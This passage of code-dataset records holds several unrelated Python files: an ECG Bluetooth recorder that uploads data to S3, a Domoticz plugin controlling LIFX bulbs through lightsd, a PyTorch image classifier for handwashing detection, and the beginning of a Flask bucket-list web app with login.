gg_client.publish(topic=topic, payload=text)\n\n\ndef connect_to_device():\n global bt_con\n bt_con = BluetoothConnect(\n host_address=config.bluetooth['host_address'],\n port=config.bluetooth['port']\n )\n return bt_con.connect()\n\n\ndef begin_recording(*args):\n global recording, topic\n ring_buffer.clear()\n while True:\n try:\n recording = True\n if bt_con.connected is False:\n recording = False\n thread.exit()\n return\n data = bt_con.get_data()\n data_model = decoder(data)\n ring_buffer.add(data_model.ecg)\n log(\"data: {}\".format(data_model.ecg))\n except TypeError as e:\n print(\"Unexpected TypeError occured\", e)\n except IndexError as e:\n print(\"Index error from device\", e)\n except bluetooth.btcommon.BluetoothError as e:\n log(\"Lost connection to device. 
Attempting to reconnect\")\n bt_con.connected = False\n\n\ndef upload_files():\n files = [f for f in listdir(config.data['location']) if isfile(join(config.data['location'], f))]\n for file in files:\n s3_client.upload_file(\n \"{}/{}\".format(config.data['location'], file),\n config.aws['bucket_name'],\n \"{}/{}\".format(config.device['id'], file))\n os.remove(\"{}/{}\".format(config.data['location'], file))\n\n\ndef record_data():\n global recording, topic\n\n # If no connection is established, connect\n if bt_con.connected is False:\n log(\"Attempting to connect to bluetooth ecg device\")\n connected = connect_to_device()\n if connected is False:\n log(\"Attempting to connect again in {} seconds\".format(config.bluetooth['reconnect_time']))\n Timer(config.bluetooth['reconnect_time'], record_data).start()\n return\n\n if recording is False:\n recording = True\n thread.start_new(begin_recording, (None,))\n\n # If connected and thread has started, begin saving\n if len(ring_buffer.buffer) > config.bluetooth['save_size']:\n file_name = file_handler.save_signal(ring_buffer.get_buffer(clear=True), \"ecg\")\n log(\"Saving buffer to file at location {}/{}\".format(\n config.data['location'],\n file_name\n ))\n Timer(0, upload_files).start()\n Timer(1, record_data).start()\n\n\n\ndef function_handler(event, context):\n return\n\nrecord_data()","sub_path":"lambdas/ecg_processing.py","file_name":"ecg_processing.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247030602","text":"# Domoticz Lifx Plugin\n# Uses lightsd, a daemon to control smart bulbs by lopter: https://github.com/lopter/lightsd/\n#\n\"\"\"\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\nimport Domoticz\nimport json\nimport base64\nimport socket\nimport random\nimport math\n\nREAD_SIZE = 4096\nENCODING = \"utf-8\"\ndevtypes={\"Original 1000\":(241,4,7),\"White 800\":(241,3,7),\"LIFX Z\":(241,4,7),\"Color 1000\":(241,4,7),\"Unknown\":(241,4,7)}\n\nclass BasePlugin:\n lightsd_socket=\"\"\n mydevices={}\n inv_mydevices = {}\n HBpass=0\n \n def __init__(self):\n return\n\n def onStart(self):\n if Parameters[\"Mode6\"] == \"Debug\":\n Domoticz.Debugging(1)\n \n if Parameters[\"Mode4\"] == \"INET\":\n Domoticz.Debug(\"INET\")\n self.lightsd_socket = socket.socket(socket.AF_INET)\n self.lightsd_socket.connect((str(Parameters[\"Address\"]),int(Parameters[\"Port\"])))\n \n else:\n Domoticz.Debug(\"UNIX\")\n self.lightsd_socket = socket.socket(socket.AF_UNIX)\n self.lightsd_socket.connect(str(Parameters[\"Mode3\"]))\n \n self.lightsd_socket.settimeout(1) # seconds \n confFile=str(Parameters[\"HomeFolder\"])+\"_lifx\"\n try:\n with open(confFile) as infile:\n self.mydevices = json.load(infile)\n except Exception:\n self.mydevices={}\n self.inv_mydevices = {v: k for k, v in self.mydevices.items()}\n \n if Parameters[\"Mode5\"] == \"Rescan\":\n for Device in list(self.mydevices.keys()):\n Domoticz.Debug(Device + \":\"+ self.mydevices[Device])\n try:\n found=Devices[int(Device)]\n except KeyError:\n self.mydevices.pop(Device)\n k=0\n for devices in self.mydevices.keys():\n k=max(k,int(devices))\n myResult = queryLIFX()\n Domoticz.Debug(\"Devices \" + str(self.mydevices))\n Domoticz.Debug(\"Devices \" + str(k))\n for i in range(len(myResult)):\n Domoticz.Debug(\"LIFX: \" + str(myResult[i][\"hsbk\"]))\n myName = \"Lamp\"\n myPower=1\n myLevel=100\n myModel = myResult[i][\"_model\"]\n myType = devtypes[myModel][0] #myType=244\n 
mySType=devtypes[myModel][1] #mySType=73\n mySwitchtype=devtypes[myModel][2] #7\n myPower=10 if (myResult[i][\"power\"]) else 0\n myLevel=str(int(myResult[i][\"hsbk\"][2]*100))\n MACADDR=str(myResult[i][\"_lifx\"][\"addr\"].replace(\":\",\"\"))\n myName = str(myResult[i][\"label\"])\n #myName = str(myResult[i][\"_model\"])\n try:\n Unit=int(self.inv_mydevices[MACADDR])\n UpdateDevice(Unit, myPower, myLevel)\n Domoticz.Debug(\"Devices exist. \" + str(Unit))\n except Exception:\n k+=1\n Domoticz.Device(Name=myName, Unit=(k), Type=myType, Subtype=mySType, Switchtype=mySwitchtype).Create()\n self.mydevices[str(k)]=MACADDR\n Domoticz.Debug(\"Devices created. \" + str(k)) \n UpdateDevice(k, myPower, myLevel)\n with open(confFile, 'w') as outfile:\n json.dump(self.mydevices, outfile)\n self.inv_mydevices = {v: k for k, v in self.mydevices.items()}\n Domoticz.Heartbeat(25)\n Domoticz.Debug(\"onStart called\")\n \n def onStop(self):\n Domoticz.Debug(\"onStop called\")\n\n def onConnect(self, Status, Description):\n Domoticz.Debug(\"onConnect called\")\n\n def onMessage(self, Data, Status, Extra):\n Domoticz.Debug(\"onMessage called:\")\n\n def onCommand(self, Unit, Command, Level, Color):\n MACADDR=self.mydevices[str(Unit)]\n Domoticz.Debug(\"onCommand called for Lifx #\" + str(Unit) + \": Parameter '\" + str(Command) + \"', Level: \" + str(Level) + \", Color: \" + str(Color))\n if (Command == 'On'):\n setLIFX(\"power_on\", [MACADDR])\n UpdateDevice(Unit, 10, Devices[Unit].sValue)\n elif (Command == 'Off'):\n setLIFX(\"power_off\", [MACADDR])\n UpdateDevice(Unit, 0, Devices[Unit].sValue)\n elif (Command == 'Set Level'):\n myResult = queryLIFX(Params=MACADDR)\n h, s, b, k = myResult[0][\"hsbk\"]\n b=Level/100\n setLIFX(\"set_light_from_hsbk\", [MACADDR, h,s,b,k,0])\n UpdateDevice(Unit, 15, str(Level))\n elif (Command == 'Set Color'):\n myResult = queryLIFX(Params=MACADDR)\n h, s, b, k = myResult[0][\"hsbk\"]\n ColorJ=json.loads(Color)\n Domoticz.Debug(\"Get Color HSB Lifx #\" + str(Unit) + \">>\" + str(h) + \":\"+ str(s) + \":\"+ str(b)+ \":\"+ str(k))\n red=ColorJ[\"r\"]/255\n green=ColorJ[\"g\"]/255\n blue=ColorJ[\"b\"]/255\n mmode=ColorJ[\"m\"]\n t=ColorJ[\"t\"]\n v=0\n if (mmode==2): # set temp\n h=0\n s=0\n v=Level/100\n k=translate(t,255,0,2500,9000)\n elif (mmode==3): # set color\n h, s, v = rgb_to_hsv(red, green, blue)\n setLIFX(\"set_light_from_hsbk\", [MACADDR, h,s,b,k,0])\n setLIFX(\"power_on\", [MACADDR])\n UpdateDevice(Unit, 10, Devices[Unit].sValue)\n UpdateDevice2(Unit, 15, str(Level), str(Color)) \n Domoticz.Debug(\"Set Color RGB Lifx #\" + str(Unit) + \">>\" + str(red) + \":\"+ str(green) + \":\"+ str(blue) + \" mode:\" + str(mmode)+ \" temp:\" + str(t))\n Domoticz.Debug(\"Set Color HSB Lifx #\" + str(Unit) + \">>\" + str(h) + \":\"+ str(s) + \":\"+ str(v) + \":\"+ str(k))\n def onNotification(self, Data):\n Domoticz.Debug(\"onNotification: \" + str(Data))\n\n def onDisconnect(self):\n Domoticz.Debug(\"onDisconnect called\")\n\n def onHeartbeat(self):\n if(self.HBpass==0):\n myResult = queryLIFX()\n ColorStr='';\n for i in range(len(myResult)):\n MACADDR=str(myResult[i][\"_lifx\"][\"addr\"].replace(\":\",\"\"))\n myPower=10 if (myResult[i][\"power\"]) else 0\n h, s, b, k = myResult[i][\"hsbk\"]\n myLevel=str(int(b*100))\n if (s==0):\n t = translate(k,2500,9000,255,0)\n ColorStr='{\"m\":2,\"r\":0,\"g\":0,\"b\":0,\"t\":'+ str(t) +',\"ww\":0,\"cw\":0}'\n else:\n red, green, blue = hsv_to_rgb(h, s, 1)\n ColorStr='{\"m\":3,\"r\":' + str(red) + ',\"g\":' + str(green) + ',\"b\":' + 
str(blue) + ',\"t\":0,\"cw\":0,\"ww\":0}'\n try:\n myDevice=int(self.inv_mydevices[MACADDR])\n UpdateDevice2(myDevice, myPower, myLevel, ColorStr)\n Domoticz.Debug(\">>Lifx #\" + str(myDevice) + \" ColorStr \" + ColorStr)\n Domoticz.Debug(\">>Lifx #\" + str(myDevice) + \" power \" + str(myPower) + \" Level \" + str(myLevel))\n Domoticz.Debug(\">>Lifx #\" + str(myDevice) + \" hsbk \" + str(myResult[i][\"hsbk\"]))\n except KeyError:\n Domoticz.Debug(\"Unknown LIFX device found\")\n self.HBpass=4\n else:\n self.HBpass-=1\n\nglobal _plugin\n_plugin = BasePlugin()\n\ndef onStart():\n global _plugin\n _plugin.onStart()\n\ndef onStop():\n global _plugin\n _plugin.onStop()\n\ndef onConnect(Status, Description):\n global _plugin\n _plugin.onConnect(Status, Description)\n\ndef onMessage(Data, Status, Extra):\n global _plugin\n _plugin.onMessage(Data, Status, Extra)\n\ndef onCommand(Unit, Command, Level, Hue):\n global _plugin\n _plugin.onCommand(Unit, Command, Level, Hue)\n\ndef onNotification(Data):\n global _plugin\n _plugin.onNotification(Data)\n\ndef onDisconnect():\n global _plugin\n _plugin.onDisconnect()\n\ndef onHeartbeat():\n global _plugin\n _plugin.onHeartbeat()\n\n # Generic helper functions\ndef DumpConfigToLog():\n for x in Parameters:\n if Parameters[x] != \"\":\n Domoticz.Debug( \"'\" + x + \"':'\" + str(Parameters[x]) + \"'\")\n Domoticz.Debug(\"Device count: \" + str(len(Devices)))\n for x in Devices:\n Domoticz.Debug(\"Device: \" + str(x) + \" - \" + str(Devices[x]))\n Domoticz.Debug(\"Device ID: '\" + str(Devices[x].ID) + \"'\")\n Domoticz.Debug(\"Device Name: '\" + Devices[x].Name + \"'\")\n Domoticz.Debug(\"Device nValue: \" + str(Devices[x].nValue))\n Domoticz.Debug(\"Device sValue: '\" + Devices[x].sValue + \"'\")\n Domoticz.Debug(\"Device LastLevel: \" + str(Devices[x].LastLevel))\n return\n\ndef UpdateDevice(Unit, nValue, sValue):\n # Make sure that the Domoticz device still exists (they can be deleted) before updating it \n if (Unit in Devices):\n if (Devices[Unit].nValue != nValue) or (Devices[Unit].sValue != sValue):\n Devices[Unit].Update(nValue, str(sValue))\n Domoticz.Debug(\"Update \"+str(nValue)+\":'\"+str(sValue)+\"' (\"+Devices[Unit].Name+\")\")\n return\n\ndef UpdateDevice2(Unit, nValue, sValue, Color):\n # Make sure that the Domoticz device still exists (they can be deleted) before updating it \n if (Unit in Devices):\n Domoticz.Debug (\">>>>>>>>>>Color: \" + \"' (\"+Devices[Unit].Name+\") \" + Devices[Unit].Color)\n if (Devices[Unit].nValue != nValue) or (Devices[Unit].sValue != sValue):\n Devices[Unit].Update(nValue=nValue, sValue=str(sValue), Color=Color)\n Domoticz.Debug(\"LIFX Update \"+str(nValue)+\":'\"+str(sValue)+\"' (\"+Devices[Unit].Name+\")\" + \" Color \" + Color)\n return\n\ndef stringToBase64(s):\n return base64.b64encode(s.encode('utf-8')).decode(\"utf-8\")\n\ndef queryLIFX(Command=\"get_light_state\", Params=\"*\"):\n request = json.dumps({\"method\": Command, \"params\": [Params], \"jsonrpc\": \"2.0\",\"id\": str(random.randint(1, 50)),}).encode(ENCODING, \"surrogateescape\")\n _plugin.lightsd_socket.sendall(request)\n response = bytearray()\n while True:\n response += _plugin.lightsd_socket.recv(READ_SIZE)\n try:\n json.loads(response.decode(ENCODING, \"ignore\"))\n break\n except Exception:\n continue\n response = response.decode(ENCODING, \"surrogateescape\")\n return json.loads(response)[\"result\"]\n \ndef setLIFX(Command, Params=[\"*\"]):\n request = json.dumps({\"method\": Command, \"params\": Params, \"jsonrpc\": 
\"2.0\",}).encode(ENCODING, \"surrogateescape\")\n Domoticz.Debug(\"request: \" + str(request))\n _plugin.lightsd_socket.sendall(request) \n return\n\ndef rgb_to_hsv(r, g, b):\n r = float(r)\n g = float(g)\n b = float(b)\n high = max(r, g, b)\n low = min(r, g, b)\n h, s, v = high, high, high\n d = high - low\n s = 0 if high == 0 else d/high\n if high == low:\n h = 0.0\n else:\n h = {r: (g - b) / d + (6 if g < b else 0), g: (b - r) / d + 2, b: (r - g) / d + 4,}[high]\n h /= 6\n h = int (h*360)\n return h, s, v\n\ndef hsv_to_rgb(h, s, v):\n h /= 360\n i = math.floor(h*6)\n f = h*6 - i\n p = v * (1-s)\n q = v * (1-f*s)\n t = v * (1-(1-f)*s)\n r, g, b = [(v, t, p),(q, v, p),(p, v, t),(p, q, v),(t, p, v),(v, p, q),][int(i%6)]\n r *=255\n g *=255\n b *=255\n return int(r), int(g), int(b)\n\ndef translate(value, leftMin, leftMax, rightMin, rightMax):\n leftSpan = leftMax - leftMin\n rightSpan = rightMax - rightMin\n valueScaled = float(value - leftMin) / float(leftSpan)\n return int(rightMin + (valueScaled * rightSpan))","sub_path":"plugins/Lifx/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":12811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472171677","text":"import torch\nimport torch.nn as nn \nimport torch.nn.functional as F \nimport torch.optim as optim\nimport torchvision.transforms as transforms\n#from tqdm import tqdm\nfrom tqdm.notebook import tqdm\nimport os\nimport time\nfrom PIL import Image\n\nclass CNNClassifier(nn.Module):\n\n def __init__(self, device):\n super(CNNClassifier, self).__init__()\n self.block1 = self.conv_block(c_in=3, c_out=256, dropout=0.1, kernel_size=5, stride=1, padding=2)\n self.block2 = self.conv_block(c_in=256, c_out=128, dropout=0.1, kernel_size=3, stride=1, padding=1)\n self.block3 = self.conv_block(c_in=128, c_out=64, dropout=0.1, kernel_size=3, stride=1, padding=1)\n self.lastcnn = nn.Conv2d(in_channels=64, out_channels=2, kernel_size=56, stride=1, padding=0)\n self.maxpool = nn.MaxPool2d(kernel_size=2, stride=2)\n self.device = device\n self.criterion = torch.nn.CrossEntropyLoss()\n self.optimizer = optim.Adam(self.parameters(), lr=0.008)\n\n def forward(self, x):\n x = self.block1(x)\n x = self.maxpool(x)\n x = self.block2(x)\n x = self.block3(x)\n x = self.maxpool(x)\n x = self.lastcnn(x)\n return x\n\n def conv_block(self, c_in, c_out, dropout, **kwargs):\n seq_block = nn.Sequential(\n nn.Conv2d(in_channels=c_in, out_channels=c_out, **kwargs),\n nn.BatchNorm2d(num_features=c_out),\n nn.ReLU(),\n nn.Dropout2d(p=dropout)\n )\n return seq_block\n\n def trainCNN(self, train_loader):\n print(\"Begin training...\")\n self.t_begin = time.time()\n for e in tqdm(range(1, 15)):\n train_epoch_loss = 0\n train_epoch_acc = 0\n self.train()\n for X_train_batch, y_train_batch in train_loader: \n X_train_batch, y_train_batch = X_train_batch.to(self.device), y_train_batch.to(self.device)\n self.optimizer.zero_grad()\n y_train_pred = self(X_train_batch).squeeze() # returns a tensor with all the dimensions of input of size 1 removed.\n #print(\"real: \", y_train_batch)\n #print(\"prediction: \", y_train_pred )\n train_loss = self.criterion(y_train_pred, y_train_batch)\n train_acc = self.binary_acc(y_train_pred, y_train_batch)\n train_loss.backward()\n self.optimizer.step()\n train_epoch_loss += train_loss.item()\n train_epoch_acc += train_acc.item()\n print(f'Epoch {e+0:02}: | Train Loss: {train_epoch_loss/len(train_loader):.5f} | Train Acc: {train_epoch_acc/len(train_loader):.3f}')\n 
self.t_end = time.time()\n print('Time of training-{}'.format((self.t_end - self.t_begin)))\n # Save the trained parameters\n #self.save_model()\n\n def evaluate(self, test_loader, best_acc=0): \n print(\"Begin testing...\")\n with torch.no_grad():\n self.eval()\n test_epoch_loss = 0\n test_epoch_acc = 0\n\n for x_batch, y_batch in tqdm(test_loader):\n x_batch, y_batch = x_batch.to(self.device), y_batch.to(self.device)\n y_test_pred = self(x_batch)\n _, y_pred_tag = torch.max(y_test_pred, dim = 1)\n y_test_pred = y_test_pred.squeeze()\n #y_test_pred = torch.unsqueeze(y_test_pred, 0)\n\n test_acc = self.binary_acc(y_test_pred, y_batch)\n test_loss = self.criterion(y_test_pred, y_batch)\n test_epoch_loss += test_loss.item()\n test_epoch_acc += test_acc.item()\n test_epoch_acc/=len(test_loader)\n print(f'Test Loss: {test_epoch_loss/len(test_loader):.5f} | Test Acc: {test_epoch_acc:.3f}')\n if test_epoch_acc > best_acc:\n print('Saving model..')\n state = {\n 'model': self.state_dict(),\n 'accuracy': test_epoch_acc,\n }\n print(\"with accuracy:\", state['accuracy'])\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save(state, './checkpoint/model.pth')\n\n\n def predict(self, filename, image_size):\n image = Image.open(filename, mode = 'r') #reading an image.\n #image = np.array(image) #the 2-d array of integer pixel values \n #image = image/255.0 #toTensor transform will bring from [0,255] tp [0, 1]\n preproc=transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n input_image = preproc(image)\n input_image = input_image.view(1, input_image.size(0), input_image.size(1), input_image.size(2))\n input_image = input_image.to(self.device)\n print(input_image.size())\n with torch.no_grad():\n self.eval()\n y_pred = self(input_image) \n print(\"pure prediction: \", y_pred)\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n print(\"after softmax: \", y_pred_tag)\n _, y_pred_tag = torch.max(y_pred_tag, dim = 1)\n print(\"final output: \", y_pred_tag)\n return y_pred_tag\n \n\n \"\"\"\n Predicts the label of test data. 
It stores misclassified\n images for later inspection.\n\n Parameters:\n - test_loader: DataLoader to be predicted.\n - save_dir: The base directory to save images\n \"\"\"\n @torch.no_grad()\n def predict_batched(self, test_loader, save_dir='.'):\n correct_num = 0\n i_ter = 0\n tot = len(test_loader.dataset)\n self.eval()\n\n for x_batch, y_batch in tqdm(test_loader):\n\n x_batch, y_batch = x_batch.to(self.device), y_batch.to(self.device)\n y_pred = self(x_batch)\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n _, y_pred_tag = torch.max(y_pred_tag, dim = 1)\n y_pred_tag = y_pred_tag.squeeze() # Flatten big boy\n\n correct_num += sum(y_pred_tag == y_batch)\n\n # Save each image in the batch if misclassified\n for idx, (expected, actual) in enumerate(zip(y_batch, y_pred_tag)):\n\n if expected == actual:\n continue\n\n name = f'{i_ter}.png'\n i_ter += 1\n tensor_image = x_batch[idx]*0.5 + 0.5\n\n self.dispatch_to_folder(save_dir, expected, actual, tensor_image, name)\n\n print(f'Total images: {tot}\\nCorrectly classfied: {correct_num}')\n\n def dispatch_to_folder(self, save_dir, expected, actual, tensor_image, name):\n misclassified_as_sink = os.path.join(save_dir, 'as_sink')\n\n if not os.path.isdir(misclassified_as_sink):\n os.mkdir(misclassified_as_sink)\n\n misclassified_as_handwash = os.path.join(save_dir, 'as_handwash')\n\n if not os.path.isdir(misclassified_as_handwash):\n os.mkdir(misclassified_as_handwash)\n \n if expected == 0 and actual == 1:\n # Handwashing misclassified as sink\n file_path = os.path.join(misclassified_as_sink, name)\n save_image(tensor_image, file_path)\n\n if expected == 1 and actual == 0:\n # Sink misclassified as handwashing\n file_path = os.path.join(misclassified_as_handwash, name)\n save_image(tensor_image, file_path)\n\n\n @torch.no_grad()\n def predict_video(self, path, save_dir, every=None):\n self.eval()\n idx = 0\n preproc=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n\n for image in self.image_generator(path, every):\n if image is None:\n break\n \n input_image = preproc(image)\n input_image = input_image.view(1, input_image.size(0), input_image.size(1), input_image.size(2))\n input_image = input_image.to(self.device)\n\n y_pred = self(input_image)\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n _, y_pred_tag = torch.max(y_pred_tag, dim = 1)\n y_pred_tag = y_pred_tag.squeeze()\n tag = y_pred_tag.item()\n \n # Save tensor as img\n\n if not os.path.isdir(save_dir):\n os.mkdir(save_dir)\n img_path = os.path.join(save_dir, f'{idx}-{tag}.png')\n save_image(input_image[0]*0.5 + 0.5, img_path)\n idx += 1\n\n\n \"\"\"\n Yields all frames from a video.\n\n Parameters:\n - path: Path to load the video from.\n - resize: tuple defining dimensions of new image.\n - every: Every how many frame to yield a frame. 
E.g.\n every = 30, means yield a frame every 30 frames.\n None for all frames.\n \"\"\"\n def image_generator(self, path, resize=(224, 224), every=None):\n cap = cv2.VideoCapture(path)\n count = 0\n try:\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n frame = cv2.resize(frame, resize)\n frame = frame[:, :, [2, 1, 0]]\n image = Image.fromarray(frame)\n if every is None or count % every == 0:\n yield image\n\n count += 1\n finally:\n cap.release()\n\n yield None\n\n \n def binary_acc(self, y_pred, y_test):\n y_pred_tag = torch.log_softmax(y_pred, dim = 1)\n _, y_pred_tags = torch.max(y_pred_tag, dim = 1)\n correct_results_sum = (y_pred_tags == y_test).sum().float()\n acc = correct_results_sum/y_test.shape[0]\n acc = torch.round(acc * 100)\n return acc\n\n\n \"\"\"def load_model(self, D_model_filename = './discriminator.pkl', G_model_filename = './generator.pkl'):\n D_model_path = os.path.join(os.getcwd(), D_model_filename)\n G_model_path = os.path.join(os.getcwd(), G_model_filename)\n self.D.load_state_dict(torch.load(D_model_path))\n self.G.load_state_dict(torch.load(G_model_path))\n print('Generator model loaded from {}.'.format(G_model_path))\n print('Discriminator model loaded from {}-'.format(D_model_path))\"\"\"\n\n\nclass CNN(nn.Module): \n def __init__(self, image_size=128, channels=3): \n super().__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n # we use the maxpool multiple times, but define it once\n self.pool = nn.MaxPool2d(2,2)\n # in_channels = 6 because self.conv1 output 6 channel\n self.conv2 = nn.Conv2d(6,16,5) \n # 5*5 comes from the dimension of the last convnet layer\n self.fc1 = nn.Linear(16*5*5, 120) #input is 400 as it is flatten after previous layer of 16x5x5\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n self.main = nn.Sequential(\n # input is (channels) x image_size x image_size; (image_size = 128)\n nn.Conv2d(channels, ndf, 4, 2, 1, bias=False), #in_channels, out_channels, kernel_size, stride=1, padding=0\n nn.LeakyReLU(0.2, inplace=True), \n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. 
(ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n\n \"\"\"model = models.Sequential()\n model.add(Conv2D(16, (15, 15), activation='relu', input_shape=(64, 64,1))) #filters, kernel_size, strides\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(32, (7, 7), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (5, 5), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n #model.add(layers.Dense(2)) # for sparse_categorial_crossentropy - then choose 2 neurons in next layer\n model.add(layers.Dense(1, activation='sigmoid'))\n opt = tf.keras.optimizers.Adam(lr=0.0005, decay=1e-6)\n model.compile(optimizer= opt , loss= tf.keras.losses.binary_crossentropy, metrics=['accuracy'])\"\"\"\n\n\n\n def forward(self, x): \n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 16*5*5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x) # no activation on final layer \n return x\n\n\n\"\"\"\nclass Discriminator(nn.Module):\n def __init__(self, ngpu, nc, ndf):\n super(Discriminator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. 
(ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n \n def forward(self, input):\n return self.main(input)\n\n\"\"\"\n\n\"\"\"\ndef create_model(self):\n # highest accuracy liveness on non-diffused iages- 16 (13,13) => 32 (7,7) => 64 (5,5) => 64 => 1 - acc = 94.2\n model = models.Sequential()\n model.add(Conv2D(16, (15, 15), activation='relu', input_shape=(64, 64,1)))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(32, (7, 7), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (5, 5), activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n #model.add(layers.Dense(2)) # for sparse_categorial_crossentropy - then choose 2 neurons in next layer\n model.add(layers.Dense(1, activation='sigmoid'))\n opt = tf.keras.optimizers.Adam(lr=0.0005, decay=1e-6)\n model.compile(optimizer= opt , loss= tf.keras.losses.binary_crossentropy, metrics=['accuracy'])\n return model\n\n def load_model(self,model_file_name):\n model = tf.keras.models.load_model(model_file_name)\n return model\n\n def train_model(self, model, train_images,train_labels,test_images, test_labels, epochs):\n cbk = CustomModelCheckpoint() # so that we can save the best model\n history = model.fit(train_images, train_labels, epochs=epochs, callbacks=[cbk], \n validation_data=(test_images, test_labels))\n #plt.plot(history.history['accuracy'], label='accuracy')\n #plt.plot(history.history['val_accuracy'], label = 'val_accuracy')\n #plt.xlabel('Epoch')\n #plt.ylabel('Accuracy')\n #plt.ylim([0.5, 1])\n #plt.legend(loc='lower right')\n #plt.show()\n return model\n\n def evaluate(self, model, test_images, test_labels):\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n return test_loss, test_acc\n\"\"\"\n","sub_path":"models/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":16451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593025276","text":"from flask import Flask\nfrom models import User\nfrom models import BucketList\nfrom models import Entry\nfrom flask import request, url_for\nfrom flask import session, render_template, redirect\nfrom flask_bower import Bower\nfrom flask_login import LoginManager\nfrom flask_login import login_user\nfrom flask_login import login_required\nfrom flask_login import current_user\nfrom flask_login import logout_user\n\napp = Flask(__name__)\napp.secret_key = 's\\xb2\\xf9?\\xeeu\\xc2\\nB\\xaf\\x97\\xecJ\\x03\\x82Sv\\xef\\x9e_\\x03\\xd3Fw'\nBower(app)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n\n@login_manager.user_loader\ndef user_loader(user_id):\n \"\"\"Given *user_id*, return the associated User object.\n :param unicode user_id: user_id (email) user to retrieve\n \"\"\"\n try:\n user = User.find_by_email(user_id)\n return user\n except KeyError:\n return None\n\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n email = None\n password = None\n error = None\n\n \"\"\"For GET requests, display the login form. 
For POSTS, login the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n email = request.form['email']\n password = request.form['password']\n\n try:\n user = User.find_by_email(email)\n if user.check_password(user.user_password, password):\n user.authenticated = True\n\n # Login and validate the user.\n # user should be an instance of your `User` class\n login_user(user, remember=True)\n\n # redirect to the home page\n return redirect(url_for('home'))\n else:\n error = 'You have entered invalid credentials'\n return render_template('login.html', error=error)\n\n except:\n error = 'The email does not exist'\n return render_template('login.html', error=error)\n\n return render_template('login.html', error=error)\n\n\n@app.route('/create_account', methods=['POST', 'GET'])\ndef create_account():\n first_name = None\n last_name = None\n user_name = None\n user_password = None\n email = None\n contact_no = None\n error = None\n\n \"\"\"For GET requests, display the registraion form. For POSTS, register the current user\n by processing the form.\"\"\"\n if request.method == \"POST\":\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n user_name = request.form['user_name']\n user_password = request.form['user_password']\n email = request.form['email']\n contact_no = request.form['contact_no']\n\n if email in User.email_index:\n error = 'User with the email already exists'\n return render_template('createaccount.html', error=error)\n else:\n user = User(first_name, last_name, user_name, user_password, email, contact_no)\n # redirect to the login page\n return redirect(url_for('login'))\n else:\n return render_template('createaccount.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n \"\"\"Logout the current user.\"\"\"\n user = current_user\n user.authenticated = False\n logout_user()\n return 